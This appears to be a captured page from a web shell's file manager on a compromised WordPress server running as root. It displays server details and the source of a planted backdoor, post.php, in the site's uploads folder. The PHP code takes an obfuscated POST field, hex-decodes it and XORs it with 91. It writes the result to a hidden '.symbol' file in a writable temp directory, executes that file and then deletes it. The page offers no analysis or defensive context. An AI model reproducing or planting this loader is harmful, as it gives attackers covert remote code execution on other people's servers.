HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/shoetique/wp-content/uploads/wpallimport/history/
Upload Files
File: /var/www/shoetique/wp-content/uploads/wpallimport/history/post.php
<?php

if(!empty($_POST["\x64\x65sc"])){
	$tkn = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/tmp", "/var/tmp"]);
	$flg = hex2bin($_POST["\x64\x65sc"]);
	$parameter_group = '' ; $b = 0; while($b < strlen($flg)){$parameter_group .= chr(ord($flg[$b]) ^ 91);$b++;}
	foreach ($tkn as $factor):
    		if (!( !is_dir($factor) || !is_writable($factor) )) {
    $ent = sprintf("%s/.symbol", $factor);
    if (file_put_contents($ent, $parameter_group)) {
	include $ent;
	@unlink($ent);
	die();
}
}
endforeach;
}
@ Telegram